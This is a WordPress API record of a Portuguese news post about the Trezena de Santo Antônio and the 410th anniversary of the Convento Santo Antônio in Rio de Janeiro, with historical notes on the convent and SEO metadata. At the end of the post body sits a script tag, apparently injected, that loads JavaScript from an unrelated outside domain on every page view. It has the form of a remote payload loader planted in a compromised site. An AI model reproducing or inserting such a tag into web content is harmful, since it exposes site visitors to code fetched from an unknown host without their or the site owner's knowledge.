{"id":161577,"date":"2018-06-04T16:43:38","date_gmt":"2018-06-04T19:43:38","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=161577"},"modified":"2020-06-25T11:23:24","modified_gmt":"2020-06-25T14:23:24","slug":"convento-santo-antonio-celebra-410-anos","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html","title":{"rendered":"Convento Santo Ant\u00f4nio celebra 410 anos"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg\" alt=\"trezena_040618_1\" width=\"830\" height=\"623\" \/><\/p>\n<p><strong>Moacir Beggo<\/strong><\/p>\n<p><strong>\u00a0<\/strong><strong>Rio de Janeiro (RJ)<\/strong> &#8211; O quarto dia da Trezena de Santo Ant\u00f4nio no Convento Santo Ant\u00f4nio do Largo da Carioca foi especial neste 4 de junho de 2018. H\u00e1 exatos 410 anos, no dia 4 de junho de 1608, v\u00e9spera de Corpus Christi, foi lan\u00e7ada a pedra fundamental do Convento, que hoje \u00e9 um dos monumentos mais importantes da cidade do Rio de Janeiro. A hist\u00f3ria desta casa franciscana se confunde com a da pr\u00f3pria cidade. Nesses quatro s\u00e9culos, o bel\u00edssimo conjunto arquitet\u00f4nico, no Centro do Rio, abriga gera\u00e7\u00f5es de franciscanos que fielmente celebram o Padroeiro com a Trezena todo ano.<\/p>\n<p>Nesta segunda-feira (4 de junho), chuvosa e fria, esse momento de a\u00e7\u00e3o de gra\u00e7as foi lembrado por Frei R\u00f3ger Brunorio, respons\u00e1vel pelos Departamento de Bens Culturais da Prov\u00edncia da Imaculada, durante a Celebra\u00e7\u00e3o Eucar\u00edstica ao meio-dia, presidida por Frei Carlos Branco, p\u00e1roco da Par\u00f3quia de S\u00e3o Francisco de Assis, em Duque de Caxias, e concelebrada pelo guardi\u00e3o e reitor do Convento, Frei Jos\u00e9 Pereira.<\/p>\n<p>&#8220;O Morro Santo Ant\u00f4nio ia at\u00e9 onde est\u00e1 hoje est\u00e1 a Catedral, o BNDEs, a Rua Evaristo da Veiga e a Rua do Lavradio. Em 1955, para tornar realidade o aterro do Flamengo, foi usada a terra proveniente do desmonte e demoli\u00e7\u00e3o parcial do morro de Santo Ant\u00f4nio. Ent\u00e3o, a gente perdeu um pouco essa no\u00e7\u00e3o do espa\u00e7o, mas o morro est\u00e1 aqui. Um peda\u00e7o dele ficou aqui. Gra\u00e7as a Deus temos esta casa, este Convento, para oferecermos nossos louvores e agradecimentos a Deus sob a intercess\u00e3o de Santo Ant\u00f4nio&#8221;, lembrou.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_040618_5.jpg\" alt=\"trezena_040618_5\" width=\"830\" height=\"478\" \/><\/p>\n<p>A &#8220;Igreja em sa\u00edda&#8221;, o tema que identifica o Pontificado do Papa Francisco, foi escolhido para este dia da Trezena. Francisco lembra na <em>Evangelii Gaudium<\/em> que a &#8220;intimidade da Igreja com Jesus \u00e9 uma intimidade itinerante&#8221;. Segundo Frei Carlos, Jesus era itinerante, Santo Ant\u00f4nio era itinerante. &#8220;Esse \u00e9 o pedido do Papa e acredito que \u00e9 o desejo de Deus de que a gente possa estar do lado do mais necessitado. Quando fala em igreja, n\u00e3o se refere ao templo de pedra. A Igreja somos n\u00f3s, povo de Deus itinerante. No templo n\u00f3s celebramos a Eucaristia, mas n\u00e3o podemos ficar parados. Temos um motivo para ir l\u00e1 fora e fazer valer essa Eucaristia. Quem comunga o Corpo e Sangue de Cristo e n\u00e3o comunga do sofrimento do outro n\u00e3o est\u00e1 comungando&#8221;, disse.<\/p>\n<p>&#8220;Em sa\u00edda \u00e9 ir ao encontro do outro. Jesus fez isso at\u00e9 no s\u00e1bado, quando era proibido. Ent\u00e3o, todos n\u00f3s devemos buscar for\u00e7as no Senhor, rezar muito, buscar coragem, mas depois tamb\u00e9m dividir, partilhar com o outro&#8221;, ressaltou o frade.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_040618_2.jpg\" alt=\"trezena_040618_2\" width=\"830\" height=\"1107\" \/><\/p>\n<p>Santo Ant\u00f4nio tamb\u00e9m foi um grande itinerante segundo o pregador deste dia. Depois de permanecer um longo per\u00edodo no eremit\u00e9rio de Montepaulo (comarca da Romagna), Frei Ant\u00f4nio come\u00e7ou uma das etapas mais significativas de sua vida como evangelizador popular. &#8220;Ele estava pregando sempre nas pra\u00e7as. Quantos milagres foram feitos fora da igreja, no meio do povo! Milagre dentro da igreja s\u00f3 existe aquele quando, tentado pelo dem\u00f4nio, tra\u00e7ou-o o sinal da Cruz sobre o m\u00e1rmore que estava ajoelhado, e a pedra tornou-se mole&#8221;, recordou. &#8220;Que Santo Ant\u00f4nio possa nos inspirar e nos dar for\u00e7a, coragem, para que possamos dar uma resposta positiva a esse desejo e vontade de Deus&#8221;, completou Frei Carlos.<\/p>\n<p>Santo Ant\u00f4nio foi sepultado no dia 17 de junho, uma ter\u00e7a-feira. Teve ent\u00e3o in\u00edcio o costume de lembr\u00e1-lo nesse dia. Hoje, nas igrejas e conventos franciscanos, as ter\u00e7as-feiras t\u00eam um movimento de fi\u00e9is maior. Ser\u00e1 assim neste Convento amanh\u00e3: Hor\u00e1rios especiais de celebra\u00e7\u00f5es eucar\u00edsticas, muita gente na fila do confession\u00e1rio e, ao fim da missa, a b\u00ean\u00e7\u00e3o de Santo Ant\u00f3nio, com aspers\u00e3o dos fi\u00e9is e distribui\u00e7\u00e3o dos p\u00e3ezinhos de Santo Ant\u00f4nio. O Cardeal D. Orani Tempesta preside a Celebra\u00e7\u00e3o Eucar\u00edstica das 18 horas. Neste dia, o tema \u00e9 &#8220;Santo Ant\u00f4nio e o cuidado pela vida&#8221;.<\/p>\n<p>.<img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_040618_3.jpg\" alt=\"trezena_040618_3\" width=\"830\" height=\"566\" \/><\/p>\n<p><strong>CONVENTO SANTO ANT\u00d4NIO<\/strong><\/p>\n<p>O lan\u00e7amento da pedra fundamental do Convento Santo Ant\u00f4nio realizou-se com grande festa no dia 4 de junho de 1608, v\u00e9spera de Corpus Christi. Depois de sete anos de trabalhos, a comunidade p\u00f4de entrar na parte do Convento acabada no dia 7 de fevereiro de 1615. Mas a constru\u00e7\u00e3o de todo o Convento com igreja somente ficou pronta em 1632.<\/p>\n<p>Frei Jer\u00f4nimo de S\u00e3o Braz se tornou o primeiro guardi\u00e3o do Convento Santo Ant\u00f4nio, depois de constitu\u00edda Prov\u00edncia aut\u00f4noma a Cust\u00f3dia da Imaculada Concei\u00e7\u00e3o.<\/p>\n<p>O primeiro Provincial, nomeado pela Santa S\u00e9 na cria\u00e7\u00e3o da Prov\u00edncia e empossado no dia 24 de dezembro de 1677, era, como j\u00e1 foi noticiado, o carioca Frei Eus\u00e9bio da Expecta\u00e7\u00e3o.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_040618_4.jpg\" alt=\"trezena_040618_4\" width=\"830\" height=\"372\" \/><\/p>\n<p>O Convento foi sempre a casa principal. Primeiro lugar de moradia do cust\u00f3dio desde 1659 e, desde 1677, era resid\u00eancia do Provincial com seu Definit\u00f3rio. Era, pois, o centro de onde irradiava a a\u00e7\u00e3o franciscana nas Capitanias do Sul, conta o historiador Frei Bas\u00edlio R\u00f6wer, OFM.<\/p>\n<p>Por Breve do Papa Clemente X, de 15 de julho de 1675, a Cust\u00f3dia n\u00e3o somente foi separada da Prov\u00edncia Santo Ant\u00f4nio, mas erigida em Prov\u00edncia aut\u00f4noma, conservando o t\u00edtulo da Imaculada Concei\u00e7\u00e3o.<\/p>\n<p>O primeiro jovem &#8220;carioca&#8221; que tomou o h\u00e1bito franciscano no Convento de Santo Ant\u00f4nio foi Frei Sebasti\u00e3o dos M\u00e1rtires, provavelmente no ano de 1638. Assinalou-se por sua intelig\u00eancia e ilustra\u00e7\u00e3o e n\u00e3o menos por sua vida de verdadeiro filho de S\u00e3o Francisco. Morreu em 1666 no mesmo Convento em que tomara o h\u00e1bito.<\/p>\n<hr \/>\n<h2><\/h2>\n<h2><strong><a href=\"http:\/\/franciscanos.org.br\/?p=161004\">VEJA COMO FOI O PRIMEIRO DIA DA TREZENA<\/a><\/strong><\/h2>\n<h2><strong><a href=\"http:\/\/franciscanos.org.br\/?p=161142\">VEJA COMO FOI O SEGUNDO DIA DA TREZENA<\/a><\/strong><\/h2>\n<h2><strong><a href=\"http:\/\/franciscanos.org.br\/?p=161310\">VEJA COMO FOI O TERCEIRO DIA DA TREZENA<\/a><\/strong><\/h2>\n<p><span style=\"text-decoration: underline;\"><strong>VEJA MAIS IMAGENS DA CELEBRA\u00c7\u00c3O<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trezena de Santo Ant\u00f4nio<\/p>\n","protected":false},"author":1,"featured_media":204288,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[401,389],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Convento Santo Ant\u00f4nio celebra 410 anos - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Convento Santo Ant\u00f4nio celebra 410 anos - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Trezena de Santo Ant\u00f4nio\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-04T19:43:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-06-25T14:23:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html\",\"name\":\"Convento Santo Ant\u00f4nio celebra 410 anos - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#primaryimage\"},\"datePublished\":\"2018-06-04T19:43:38+00:00\",\"dateModified\":\"2020-06-25T14:23:24+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Convento Santo Ant\u00f4nio celebra 410 anos\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Convento Santo Ant\u00f4nio celebra 410 anos - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html","og_locale":"pt_BR","og_type":"article","og_title":"Convento Santo Ant\u00f4nio celebra 410 anos - Not\u00edcias - Franciscanos","og_description":"Trezena de Santo Ant\u00f4nio","og_url":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-06-04T19:43:38+00:00","article_modified_time":"2020-06-25T14:23:24+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_040618_1.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html","name":"Convento Santo Ant\u00f4nio celebra 410 anos - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#primaryimage"},"datePublished":"2018-06-04T19:43:38+00:00","dateModified":"2020-06-25T14:23:24+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/convento-santo-antonio-celebra-410-anos.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Convento Santo Ant\u00f4nio celebra 410 anos"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/161577"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=161577"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/161577\/revisions"}],"predecessor-version":[{"id":226767,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/161577\/revisions\/226767"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/204288"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=161577"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=161577"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=161577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}